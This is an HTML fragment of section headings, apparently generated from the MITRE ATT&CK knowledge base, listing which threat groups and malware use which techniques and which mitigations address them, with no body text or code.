<h3 id="_oilrig_g0049_uses_net_s0039"><a class="anchor" href="#_oilrig_g0049_uses_net_s0039"></a><a class="link" href="#_oilrig_g0049_uses_net_s0039">OilRig (G0049) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_lsass_driver_t1177"><a class="anchor" href="#_wingbird_s0176_uses_lsass_driver_t1177"></a><a class="link" href="#_wingbird_s0176_uses_lsass_driver_t1177">Wingbird (S0176) uses LSASS Driver (T1177)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_gazer_s0168_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_gazer_s0168_uses_registry_run_keys_start_folder_t1060">Gazer (S0168) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_command_line_interface_t1059"><a class="anchor" href="#_emissary_s0082_uses_command_line_interface_t1059"></a><a class="link" href="#_emissary_s0082_uses_command_line_interface_t1059">Emissary (S0082) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_data_encoding_t1132"><a class="anchor" href="#_mis_type_s0084_uses_data_encoding_t1132"></a><a class="link" href="#_mis_type_s0084_uses_data_encoding_t1132">Mis-Type (S0084) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_fallback_channels_t1008"><a class="anchor" href="#_oilrig_g0049_uses_fallback_channels_t1008"></a><a class="link" href="#_oilrig_g0049_uses_fallback_channels_t1008">OilRig (G0049) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_komplex_s0162_uses_process_discovery_t1057"><a class="anchor" href="#_komplex_s0162_uses_process_discovery_t1057"></a><a class="link" href="#_komplex_s0162_uses_process_discovery_t1057">Komplex (S0162) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_data_from_local_system_t1005"><a class="anchor" href="#_threat_group_3390_g0027_uses_data_from_local_system_t1005"></a><a class="link" href="#_threat_group_3390_g0027_uses_data_from_local_system_t1005">Threat Group-3390 (G0027) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_install_root_certificate_mitigation_t1130_mitigates_install_root_certificate_t1130"><a class="anchor" href="#_install_root_certificate_mitigation_t1130_mitigates_install_root_certificate_t1130"></a><a class="link" href="#_install_root_certificate_mitigation_t1130_mitigates_install_root_certificate_t1130">Install Root Certificate Mitigation (T1130) mitigates Install Root Certificate (T1130)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_disabling_security_tools_t1089"><a class="anchor" href="#_carbanak_g0008_uses_disabling_security_tools_t1089"></a><a class="link" href="#_carbanak_g0008_uses_disabling_security_tools_t1089">Carbanak (G0008) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackcoffee_s0069_uses_web_service_t1102"><a class="anchor" href="#_blackcoffee_s0069_uses_web_service_t1102"></a><a class="link" href="#_blackcoffee_s0069_uses_web_service_t1102">BLACKCOFFEE (S0069) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_accessibility_features_mitigation_t1015_mitigates_accessibility_features_t1015"><a class="anchor" href="#_accessibility_features_mitigation_t1015_mitigates_accessibility_features_t1015"></a><a class="link" href="#_accessibility_features_mitigation_t1015_mitigates_accessibility_features_t1015">Accessibility Features Mitigation (T1015) mitigates Accessibility Features (T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_ftp_s0095"><a class="anchor" href="#_naikon_g0019_uses_ftp_s0095"></a><a class="link" href="#_naikon_g0019_uses_ftp_s0095">Naikon (G0019) uses FTP (S0095)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_web_service_t1102"><a class="anchor" href="#_patchwork_g0040_uses_web_service_t1102"></a><a class="link" href="#_patchwork_g0040_uses_web_service_t1102">Patchwork (G0040) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_disabling_security_tools_t1089"><a class="anchor" href="#_chches_s0144_uses_disabling_security_tools_t1089"></a><a class="link" href="#_chches_s0144_uses_disabling_security_tools_t1089">ChChes (S0144) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_process_discovery_t1057"><a class="anchor" href="#_neteagle_s0034_uses_process_discovery_t1057"></a><a class="link" href="#_neteagle_s0034_uses_process_discovery_t1057">NETEAGLE (S0034) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_poshspy_s0150_uses_powershell_t1086"><a class="anchor" href="#_poshspy_s0150_uses_powershell_t1086"></a><a class="link" href="#_poshspy_s0150_uses_powershell_t1086">POSHSPY (S0150) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_automated_collection_t1119"><a class="anchor" href="#_t9000_s0098_uses_automated_collection_t1119"></a><a class="link" href="#_t9000_s0098_uses_automated_collection_t1119">T9000 (S0098) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_dll_search_order_hijacking_mitigation_t1038_mitigates_dll_search_order_hijacking_t1038"><a class="anchor" href="#_dll_search_order_hijacking_mitigation_t1038_mitigates_dll_search_order_hijacking_t1038"></a><a class="link" href="#_dll_search_order_hijacking_mitigation_t1038_mitigates_dll_search_order_hijacking_t1038">DLL Search Order Hijacking Mitigation (T1038) mitigates DLL Search Order Hijacking (T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_scheduled_task_t1053"><a class="anchor" href="#_apt29_g0016_uses_scheduled_task_t1053"></a><a class="link" href="#_apt29_g0016_uses_scheduled_task_t1053">APT29 (G0016) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_soundbite_s0157_uses_modify_registry_t1112"><a class="anchor" href="#_soundbite_s0157_uses_modify_registry_t1112"></a><a class="link" href="#_soundbite_s0157_uses_modify_registry_t1112">SOUNDBITE (S0157) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_redundant_access_mitigation_t1108_mitigates_redundant_access_t1108"><a class="anchor" href="#_redundant_access_mitigation_t1108_mitigates_redundant_access_t1108"></a><a class="link" href="#_redundant_access_mitigation_t1108_mitigates_redundant_access_t1108">Redundant Access Mitigation (T1108) mitigates Redundant Access (T1108)</a></h3>
</div>
<div class="sect2">
<h3 id="_system_information_discovery_mitigation_t1082_mitigates_system_information_discovery_t1082"><a class="anchor" href="#_system_information_discovery_mitigation_t1082_mitigates_system_information_discovery_t1082"></a><a class="link" href="#_system_information_discovery_mitigation_t1082_mitigates_system_information_discovery_t1082">System Information Discovery Mitigation (T1082) mitigates System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_turla_g0010_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_turla_g0010_uses_system_network_connections_discovery_t1049">Turla (G0010) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_remote_file_copy_t1105"><a class="anchor" href="#_redleaves_s0153_uses_remote_file_copy_t1105"></a><a class="link" href="#_redleaves_s0153_uses_remote_file_copy_t1105">RedLeaves (S0153) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_hacking_team_uefi_rootkit_s0047_uses_rootkit_t1014"><a class="anchor" href="#_hacking_team_uefi_rootkit_s0047_uses_rootkit_t1014"></a><a class="link" href="#_hacking_team_uefi_rootkit_s0047_uses_rootkit_t1014">Hacking Team UEFI Rootkit (S0047) uses Rootkit (T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_physical_medium_mitigation_t1052_mitigates_exfiltration_over_physical_medium_t1052"><a class="anchor" href="#_exfiltration_over_physical_medium_mitigation_t1052_mitigates_exfiltration_over_physical_medium_t1052"></a><a class="link" href="#_exfiltration_over_physical_medium_mitigation_t1052_mitigates_exfiltration_over_physical_medium_t1052">Exfiltration Over Physical Medium Mitigation (T1052) mitigates Exfiltration Over Physical Medium (T1052)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_input_capture_t1056"><a class="anchor" href="#_cobalt_strike_s0154_uses_input_capture_t1056"></a><a class="link" href="#_cobalt_strike_s0154_uses_input_capture_t1056">Cobalt Strike (S0154) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_uroburos_s0022"><a class="anchor" href="#_turla_g0010_uses_uroburos_s0022"></a><a class="link" href="#_turla_g0010_uses_uroburos_s0022">Turla (G0010) uses Uroburos (S0022)</a></h3>
</div>
<div class="sect2">
<h3 id="_axiom_g0001_uses_hikit_s0009"><a class="anchor" href="#_axiom_g0001_uses_hikit_s0009"></a><a class="link" href="#_axiom_g0001_uses_hikit_s0009">Axiom (G0001) uses Hikit (S0009)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_powershell_t1086"><a class="anchor" href="#_apt29_g0016_uses_powershell_t1086"></a><a class="link" href="#_apt29_g0016_uses_powershell_t1086">APT29 (G0016) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_input_capture_t1056"><a class="anchor" href="#_sslmm_s0058_uses_input_capture_t1056"></a><a class="link" href="#_sslmm_s0058_uses_input_capture_t1056">SslMM (S0058) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_windows_admin_shares_t1077"><a class="anchor" href="#_net_s0039_uses_windows_admin_shares_t1077"></a><a class="link" href="#_net_s0039_uses_windows_admin_shares_t1077">Net (S0039) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_tinyzbot_s0004_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_tinyzbot_s0004_uses_registry_run_keys_start_folder_t1060">TinyZBot (S0004) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_neteagle_s0034_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_neteagle_s0034_uses_registry_run_keys_start_folder_t1060">NETEAGLE (S0034) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_helminth_s0170"><a class="anchor" href="#_oilrig_g0049_uses_helminth_s0170"></a><a class="link" href="#_oilrig_g0049_uses_helminth_s0170">OilRig (G0049) uses Helminth (S0170)</a></h3>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072_uses_input_capture_t1056"><a class="anchor" href="#_owaauth_s0072_uses_input_capture_t1056"></a><a class="link" href="#_owaauth_s0072_uses_input_capture_t1056">OwaAuth (S0072) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_data_encoding_t1132"><a class="anchor" href="#_coreshell_s0137_uses_data_encoding_t1132"></a><a class="link" href="#_coreshell_s0137_uses_data_encoding_t1132">CORESHELL (S0137) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_remote_system_discovery_t1018"><a class="anchor" href="#_fin6_g0037_uses_remote_system_discovery_t1018"></a><a class="link" href="#_fin6_g0037_uses_remote_system_discovery_t1018">FIN6 (G0037) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_connection_proxy_t1090"><a class="anchor" href="#_backspace_s0031_uses_connection_proxy_t1090"></a><a class="link" href="#_backspace_s0031_uses_connection_proxy_t1090">BACKSPACE (S0031) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_two_factor_authentication_interception_mitigation_t1111_mitigates_two_factor_authentication_interception_t1111"><a class="anchor" href="#_two_factor_authentication_interception_mitigation_t1111_mitigates_two_factor_authentication_interception_t1111"></a><a class="link" href="#_two_factor_authentication_interception_mitigation_t1111_mitigates_two_factor_authentication_interception_t1111">Two-Factor Authentication Interception Mitigation (T1111) mitigates Two-Factor Authentication Interception (T1111)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_rtm_s0148_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_rtm_s0148_uses_system_owner_user_discovery_t1033">RTM (S0148) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_psylo_s0078_uses_timestomp_t1099"><a class="anchor" href="#_psylo_s0078_uses_timestomp_t1099"></a><a class="link" href="#_psylo_s0078_uses_timestomp_t1099">Psylo (S0078) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_lazarus_group_g0032_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_lazarus_group_g0032_uses_standard_cryptographic_protocol_t1032">Lazarus Group (G0032) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_pittytiger_g0011_uses_gsecdump_s0008"><a class="anchor" href="#_pittytiger_g0011_uses_gsecdump_s0008"></a><a class="link" href="#_pittytiger_g0011_uses_gsecdump_s0008">PittyTiger (G0011) uses gsecdump (S0008)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_data_encrypted_t1022"><a class="anchor" href="#_lazarus_group_g0032_uses_data_encrypted_t1022"></a><a class="link" href="#_lazarus_group_g0032_uses_data_encrypted_t1022">Lazarus Group (G0032) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_automated_collection_t1119"><a class="anchor" href="#_rover_s0090_uses_automated_collection_t1119"></a><a class="link" href="#_rover_s0090_uses_automated_collection_t1119">Rover (S0090) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_epic_s0091_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_epic_s0091_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_epic_s0091_uses_standard_application_layer_protocol_t1071">Epic (S0091) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_screen_capture_t1113"><a class="anchor" href="#_apt34_g0057_uses_screen_capture_t1113"></a><a class="link" href="#_apt34_g0057_uses_screen_capture_t1113">APT34 (G0057) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_blackenergy_s0089_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_blackenergy_s0089_uses_file_and_directory_discovery_t1083">BlackEnergy (S0089) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_modify_registry_t1112"><a class="anchor" href="#_rtm_s0148_uses_modify_registry_t1112"></a><a class="link" href="#_rtm_s0148_uses_modify_registry_t1112">RTM (S0148) uses Modify Registry (T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_data_encoding_t1132"><a class="anchor" href="#_advstoreshell_s0045_uses_data_encoding_t1132"></a><a class="link" href="#_advstoreshell_s0045_uses_data_encoding_t1132">ADVSTORESHELL (S0045) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_dll_side_loading_t1073"><a class="anchor" href="#_badnews_s0128_uses_dll_side_loading_t1073"></a><a class="link" href="#_badnews_s0128_uses_dll_side_loading_t1073">BADNEWS (S0128) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_remote_services_mitigation_t1021_mitigates_remote_services_t1021"><a class="anchor" href="#_remote_services_mitigation_t1021_mitigates_remote_services_t1021"></a><a class="link" href="#_remote_services_mitigation_t1021_mitigates_remote_services_t1021">Remote Services Mitigation (T1021) mitigates Remote Services (T1021)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_new_service_t1050"><a class="anchor" href="#_cosmicduke_s0050_uses_new_service_t1050"></a><a class="link" href="#_cosmicduke_s0050_uses_new_service_t1050">CosmicDuke (S0050) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_menupass_g0045_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_menupass_g0045_uses_system_network_configuration_discovery_t1016">menuPass (G0045) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_process_doppelgänging_mitigation_t1186_mitigates_process_doppelgänging_t1186"><a class="anchor" href="#_process_doppelgänging_mitigation_t1186_mitigates_process_doppelgänging_t1186"></a><a class="link" href="#_process_doppelgänging_mitigation_t1186_mitigates_process_doppelgänging_t1186">Process Doppelgänging Mitigation (T1186) mitigates Process Doppelgänging (T1186)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_command_line_interface_t1059"><a class="anchor" href="#_xtunnel_s0117_uses_command_line_interface_t1059"></a><a class="link" href="#_xtunnel_s0117_uses_command_line_interface_t1059">XTunnel (S0117) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_system_owner_user_discovery_t1033">Backdoor.Oldrea (S0093) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_moonwind_s0149_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_moonwind_s0149_uses_standard_non_application_layer_protocol_t1095">MoonWind (S0149) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_disabling_security_tools_mitigation_t1089_mitigates_disabling_security_tools_t1089"><a class="anchor" href="#_disabling_security_tools_mitigation_t1089_mitigates_disabling_security_tools_t1089"></a><a class="link" href="#_disabling_security_tools_mitigation_t1089_mitigates_disabling_security_tools_t1089">Disabling Security Tools Mitigation (T1089) mitigates Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_fin6_g0037_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_fin6_g0037_uses_standard_cryptographic_protocol_t1032">FIN6 (G0037) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_command_line_interface_t1059"><a class="anchor" href="#_daserf_s0187_uses_command_line_interface_t1059"></a><a class="link" href="#_daserf_s0187_uses_command_line_interface_t1059">Daserf (S0187) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_bbsrat_s0127_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_bbsrat_s0127_uses_custom_cryptographic_protocol_t1024">BBSRAT (S0127) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_automated_collection_t1119"><a class="anchor" href="#_oilrig_g0049_uses_automated_collection_t1119"></a><a class="link" href="#_oilrig_g0049_uses_automated_collection_t1119">OilRig (G0049) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_apt29_g0016_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_apt29_g0016_uses_registry_run_keys_start_folder_t1060">APT29 (G0016) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_tasklist_s0057"><a class="anchor" href="#_apt34_g0057_uses_tasklist_s0057"></a><a class="link" href="#_apt34_g0057_uses_tasklist_s0057">APT34 (G0057) uses Tasklist (S0057)</a></h3>
</div>
<div class="sect2">
<h3 id="_copykittens_g0052_uses_powershell_t1086"><a class="anchor" href="#_copykittens_g0052_uses_powershell_t1086"></a><a class="link" href="#_copykittens_g0052_uses_powershell_t1086">CopyKittens (G0052) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_apt28_g0007_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_apt28_g0007_uses_obfuscated_files_or_information_t1027">APT28 (G0007) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_screen_capture_t1113"><a class="anchor" href="#_cosmicduke_s0050_uses_screen_capture_t1113"></a><a class="link" href="#_cosmicduke_s0050_uses_screen_capture_t1113">CosmicDuke (S0050) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_scripting_t1064"><a class="anchor" href="#_bronze_butler_g0060_uses_scripting_t1064"></a><a class="link" href="#_bronze_butler_g0060_uses_scripting_t1064">BRONZE BUTLER (G0060) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_tdtess_s0164_uses_command_line_interface_t1059"><a class="anchor" href="#_tdtess_s0164_uses_command_line_interface_t1059"></a><a class="link" href="#_tdtess_s0164_uses_command_line_interface_t1059">TDTESS (S0164) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_data_staged_t1074"><a class="anchor" href="#_badnews_s0128_uses_data_staged_t1074"></a><a class="link" href="#_badnews_s0128_uses_data_staged_t1074">BADNEWS (S0128) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_plugx_s0013_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_plugx_s0013_uses_standard_application_layer_protocol_t1071">PlugX (S0013) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_monsoon_g0042_uses_tinytyphon_s0131"><a class="anchor" href="#_monsoon_g0042_uses_tinytyphon_s0131"></a><a class="link" href="#_monsoon_g0042_uses_tinytyphon_s0131">MONSOON (G0042) uses TINYTYPHON (S0131)</a></h3>
</div>
<div class="sect2">
<h3 id="_password_filter_dll_mitigation_t1174_mitigates_password_filter_dll_t1174"><a class="anchor" href="#_password_filter_dll_mitigation_t1174_mitigates_password_filter_dll_t1174"></a><a class="link" href="#_password_filter_dll_mitigation_t1174_mitigates_password_filter_dll_t1174">Password Filter DLL Mitigation (T1174) mitigates Password Filter DLL (T1174)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_system_information_discovery_t1082"><a class="anchor" href="#_redleaves_s0153_uses_system_information_discovery_t1082"></a><a class="link" href="#_redleaves_s0153_uses_system_information_discovery_t1082">RedLeaves (S0153) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_phoreal_s0158_uses_command_line_interface_t1059"><a class="anchor" href="#_phoreal_s0158_uses_command_line_interface_t1059"></a><a class="link" href="#_phoreal_s0158_uses_command_line_interface_t1059">PHOREAL (S0158) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_pass_the_hash_mitigation_t1075_mitigates_pass_the_hash_t1075"><a class="anchor" href="#_pass_the_hash_mitigation_t1075_mitigates_pass_the_hash_t1075"></a><a class="link" href="#_pass_the_hash_mitigation_t1075_mitigates_pass_the_hash_t1075">Pass the Hash Mitigation (T1075) mitigates Pass the Hash (T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_evilgrab_s0152_uses_commonly_used_port_t1043"><a class="anchor" href="#_evilgrab_s0152_uses_commonly_used_port_t1043"></a><a class="link" href="#_evilgrab_s0152_uses_commonly_used_port_t1043">EvilGrab (S0152) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_standard_cryptographic_protocol_mitigation_t1032_mitigates_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_standard_cryptographic_protocol_mitigation_t1032_mitigates_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_standard_cryptographic_protocol_mitigation_t1032_mitigates_standard_cryptographic_protocol_t1032">Standard Cryptographic Protocol Mitigation (T1032) mitigates Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_1314_g0028_uses_net_s0039"><a class="anchor" href="#_threat_group_1314_g0028_uses_net_s0039"></a><a class="link" href="#_threat_group_1314_g0028_uses_net_s0039">Threat Group-1314 (G0028) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_prikormka_s0113_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_prikormka_s0113_uses_peripheral_device_discovery_t1120">Prikormka (S0113) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_ipconfig_s0100"><a class="anchor" href="#_oilrig_g0049_uses_ipconfig_s0100"></a><a class="link" href="#_oilrig_g0049_uses_ipconfig_s0100">OilRig (G0049) uses ipconfig (S0100)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_input_capture_t1056"><a class="anchor" href="#_prikormka_s0113_uses_input_capture_t1056"></a><a class="link" href="#_prikormka_s0113_uses_input_capture_t1056">Prikormka (S0113) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_command_line_interface_t1059"><a class="anchor" href="#_seaduke_s0053_uses_command_line_interface_t1059"></a><a class="link" href="#_seaduke_s0053_uses_command_line_interface_t1059">SeaDuke (S0053) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_command_line_interface_mitigation_t1059_mitigates_command_line_interface_t1059"><a class="anchor" href="#_command_line_interface_mitigation_t1059_mitigates_command_line_interface_t1059"></a><a class="link" href="#_command_line_interface_mitigation_t1059_mitigates_command_line_interface_t1059">Command-Line Interface Mitigation (T1059) mitigates Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_multilayer_encryption_t1079"><a class="anchor" href="#_sykipot_s0018_uses_multilayer_encryption_t1079"></a><a class="link" href="#_sykipot_s0018_uses_multilayer_encryption_t1079">Sykipot (S0018) uses Multilayer Encryption (T1079)</a></h3>
</div>
<div class="sect2">
<h3 id="_taidoor_g0015_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_taidoor_g0015_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_taidoor_g0015_uses_standard_cryptographic_protocol_t1032">Taidoor (G0015) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_pwdump_s0006"><a class="anchor" href="#_apt1_g0006_uses_pwdump_s0006"></a><a class="link" href="#_apt1_g0006_uses_pwdump_s0006">APT1 (G0006) uses pwdump (S0006)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_command_line_interface_t1059"><a class="anchor" href="#_advstoreshell_s0045_uses_command_line_interface_t1059"></a><a class="link" href="#_advstoreshell_s0045_uses_command_line_interface_t1059">ADVSTORESHELL (S0045) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_windows_management_instrumentation_event_subscription_t1084"><a class="anchor" href="#_apt29_g0016_uses_windows_management_instrumentation_event_subscription_t1084"></a><a class="link" href="#_apt29_g0016_uses_windows_management_instrumentation_event_subscription_t1084">APT29 (G0016) uses Windows Management Instrumentation Event Subscription (T1084)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_pteranodon_s0147_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_pteranodon_s0147_uses_standard_application_layer_protocol_t1071">Pteranodon (S0147) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_blackenergy_s0089_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_blackenergy_s0089_uses_system_network_configuration_discovery_t1016">BlackEnergy (S0089) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_forced_authentication_mitigation_t1187_mitigates_forced_authentication_t1187"><a class="anchor" href="#_forced_authentication_mitigation_t1187_mitigates_forced_authentication_t1187"></a><a class="link" href="#_forced_authentication_mitigation_t1187_mitigates_forced_authentication_t1187">Forced Authentication Mitigation (T1187) mitigates Forced Authentication (T1187)</a></h3>
</div>
<div class="sect2">
<h3 id="_powersource_s0145_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_powersource_s0145_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_powersource_s0145_uses_registry_run_keys_start_folder_t1060">POWERSOURCE (S0145) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
